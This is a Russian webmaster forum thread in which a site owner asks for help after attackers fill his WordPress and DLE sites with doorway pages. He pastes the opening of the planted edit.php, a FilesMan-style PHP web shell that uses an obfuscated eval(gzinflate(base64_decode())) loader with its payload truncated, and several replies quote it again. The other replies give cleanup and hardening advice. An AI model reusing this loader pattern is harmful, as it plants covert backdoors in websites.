Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Помогите! Взломали ФТП.

12
gaishnik123
На сайте с 31.03.2009
Offline
61
gaishnik123
5519

Здравствуйте!

К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..

Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:

<?php

$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl

В общем ЖОПА!!! Помогите, кто может... Достала эта хрень:dont:

sergey885
На сайте с 19.08.2002
Offline
248
sergey885
#1

вычисти код, закрой на время доступ на ftp, попробуй sftp

интернет-маркетинг. стратегии развития веб-проектов.
kirill2009
На сайте с 20.08.2009
Offline
52
kirill2009
#2
gaishnik123:
Здравствуйте!

К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..

Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:

<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl

В общем ЖОПА!!! Помогите, кто может... Достала эта хрень🙅

проверьте свой комп на вирусы.

Результаты: ТИЦ 300, PR 6 - ОТ САПЫ (http://www.sape.ru/r.DSXgZcFAAV.php) "Вечные ссылки и статьи" (http://www.liex.ru/A5B7B2E9B3816577D46B87359EC8781E.htm)"Заработок для вебмастеров" (http://advego.ru/7hGY8GSPW5)
romanuza
На сайте с 23.03.2010
Offline
54
romanuza
#3
gaishnik123:
Здравствуйте!

К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..

Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:

<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl

В общем ЖОПА!!! Помогите, кто может... Достала эта хрень🙅

Какой CMS пользуешься?

AOMEI Backupper is the simplest FREE backup software with system/disk/partition/file backups and system/disk clone.
(http://www.backup-utility.com)
H
На сайте с 04.04.2008
Offline
160
hellworm
#4
gaishnik123:
Здравствуйте!

К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..

Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:

<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl

В общем ЖОПА!!! Помогите, кто может... Достала эта хрень🙅

Проверяете свой комп на вирусы , далее пишите хостеру чтобы восстановил все файлы из бэкапа за ту дату когда всего этого ещё не было . А далее ищете дыры в движке ! ;)

gaishnik123
На сайте с 31.03.2009
Offline
61
gaishnik123
#5

Использую WordPress 3.0 и DLE 8.5 лицензия. И те и другие хакнули.

Комп проверил на все, что можно. Почистил реестр, переустановил браузеры. Теперь юзаю sftp. Сменил еще раз пароль.

gaishnik123 добавил 15.07.2010 в 13:05

hellworm:
Проверяете свой комп на вирусы , далее пишите хостеру чтобы восстановил все файлы из бэкапа за ту дату когда всего этого ещё не было . А далее ищете дыры в движке ! ;)

да я сам беру файлы из бэкапа)) благо, хостинг TimeWeb🚬 просто был в отъезде 2 недели, а бэкапы только за 4 дня. дыры в движке... сейчас курю форумы поддержки дле и ворда.

ceomen
На сайте с 26.06.2009
Offline
97
ceomen
#6

Хост тоже может быть дырявый. Это нужно знать, особенно когда самопальные и левые хостинги.

Бэкапы с таких нужно качать себе или на другой хост тоже.

Причем хостинг всегда все будет отрицать.

Посмотрите логи. Откуда и кто к вам залазил.

И когда нароете на форумах про wp 3.0 - пож. черканите. А то тоже обновился недавно до него.

romanuza
На сайте с 23.03.2010
Offline
54
romanuza
#7

С DLE были похожие пробелы, решил их вот так ТЫЦ и ТЫЦ

а фтп скорее всего не ломали просто есть ДЫРЫ в движках через них и лазят

gaishnik123
На сайте с 31.03.2009
Offline
61
gaishnik123
#8

Хорошо, админку защищу. Но вот скажите, разве реально через дыру в двиге залить на этот сайт и другие дорвей?! Т.е. у меня там сотня .хтмл страниц порнухи! На каждом сайте. Я думаю, что это только через ФТП...

Как ускорить индексацию сайта Мистика какая-то со шрифтами Агрегаторы не индексируются?
H
На сайте с 04.04.2008
Offline
160
hellworm
#9
gaishnik123:
Хорошо, админку защищу. Но вот скажите, разве реально через дыру в двиге залить на этот сайт и другие дорвей?! Т.е. у меня там сотня .хтмл страниц порнухи! На каждом сайте. Я думаю, что это только через ФТП...

Залили через дыру один раз скрипт, а он уже всё удалённо закачивает ! ;)

gaishnik123
На сайте с 31.03.2009
Offline
61
gaishnik123
#10
hellworm:
Залили через дыру один раз скрипт, а он уже всё удалённо закачивает ! ;)

да, скорее всего так и было дело. нашли дыру в 1 ДЛЕ сайте. потом лили доры на все сайты.

итак, я переустановил DLE, поставил защиту админки по IP. еще удалил все текстовые файлы а-ля Readme, чтобы хакер не узнал никакой информации о движке и о модулях, которые там стоят. запоролил некоторые папки с помощью хоста.

итог: пока затишье... файлов новых не появляется. если, что еще нарою - отпишу.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий